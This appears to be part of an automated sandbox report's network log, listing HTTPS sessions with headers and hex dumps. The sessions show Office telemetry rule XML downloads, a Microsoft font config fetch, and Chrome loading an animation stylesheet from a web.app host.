                                                                                                                                                                                                                                                                                Data Ascii: }),C},se.matches=function(e,t){return se(e,null,null,t)},se.matchesSelector=function(e,t){if((e.ownerDocument||e)!==C&&T(e),d.matchesSelector&&E&&!A[t+" "]&&(!s||!s.test(t))&&(!v||!v.test(t)))try{var n=c.call(e,t);if(n||d.disconnectedMatch||e.document&&11


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                11192.168.2.64973313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3ea0840d-701e-0053-1012-173a0a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144154Z-1657d5bbd48xdq5dkwwugdpzr000000002eg000000008ckt
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                12192.168.2.64973713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144154Z-1657d5bbd48sdh4cyzadbb374800000001ug00000000nwqh
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                13192.168.2.64973513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144154Z-1657d5bbd48sdh4cyzadbb3748000000021g000000002f7x
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                14192.168.2.64973613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144154Z-1657d5bbd48762wn1qw4s5sd3000000001vg00000000r2z4
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                15192.168.2.64973413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144154Z-1657d5bbd48q6t9vvmrkd293mg000000023g00000000966z
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                16192.168.2.649738184.28.90.27443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=7445
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                17192.168.2.649739199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC515OUTGET /appboy.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC606INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 43269
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                                Etag: "3d5307d2385c8a6fbad8aae5d8afd1f361fd75d2709b439ce20165f4894452f1"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740050-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.429196,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 61 6e 69 6d 53 6c 69 64 65 49 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 35 30 30 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 35 30 30 2c 30 2c 30 2c 31 29 7d 31 2e 33 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 32 30 37 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 33 39 35 2e 30 33 34 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 32 30 37 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                                                Data Ascii: @-webkit-keyframes animSlideIn{0%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,500,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,500,0,0,1)}1.3%{-webkit-transform:matrix3d(1.207,0,0,0,0,1,0,0,0,0,1,0,395.034,0,0,1);transform:matrix3d(1.207,0,0,0
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 36 2e 31 32 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 39 39 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2d 32 31 2e 36 37 38 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 2e 39 39 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2d 32 31 2e 36 37 38 2c 30 2c 30 2c 31 29 7d 32 37 2e 32 33 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2d 33 2e 39 31 39 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2d 33 2e 39
                                                                                                                                                                                                                                                                                Data Ascii: 6.12%{-webkit-transform:matrix3d(.996,0,0,0,0,1,0,0,0,0,1,0,-21.678,0,0,1);transform:matrix3d(.996,0,0,0,0,1,0,0,0,0,1,0,-21.678,0,0,1)}27.23%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,-3.919,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,-3.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 32 35 34 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 33 30 34 2e 36 36 33 2c 30 2c 30 2c 31 29 7d 34 2e 31 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 32 31 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 32 30 39 2e 38 35 34 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 32 31 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 32 30 39 2e 38 35 34 2c 30 2c 30 2c 31 29 7d 35 2e 37 31 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2e 31 34 36 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 31 33
                                                                                                                                                                                                                                                                                Data Ascii: rm:matrix3d(1.254,0,0,0,0,1,0,0,0,0,1,0,304.663,0,0,1)}4.1%{-webkit-transform:matrix3d(1.216,0,0,0,0,1,0,0,0,0,1,0,209.854,0,0,1);transform:matrix3d(1.216,0,0,0,0,1,0,0,0,0,1,0,209.854,0,0,1)}5.71%{-webkit-transform:matrix3d(1.146,0,0,0,0,1,0,0,0,0,1,0,13
                                                                                                                                                                                                                                                                                2024-10-06 14:41:54 UTC1378INData Raw: 30 2c 30 2c 30 2c 31 2c 30 2c 2d 33 2e 35 33 34 2c 30 2c 30 2c 31 29 7d 33 38 2e 33 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2e 35 31 38 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2e 35 31 38 2c 30 2c 30 2c 31 29 7d 34 30 2e 30 39 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 2e 34 38 35 2c 30 2c 30 2c 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 6d 61 74 72 69 78 33 64 28 31 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                                                Data Ascii: 0,0,0,1,0,-3.534,0,0,1)}38.34%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,.518,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,.518,0,0,1)}40.09%{-webkit-transform:matrix3d(1,0,0,0,0,1,0,0,0,0,1,0,.485,0,0,1);transform:matrix3d(1,0,0,0,0,1,0,0,0
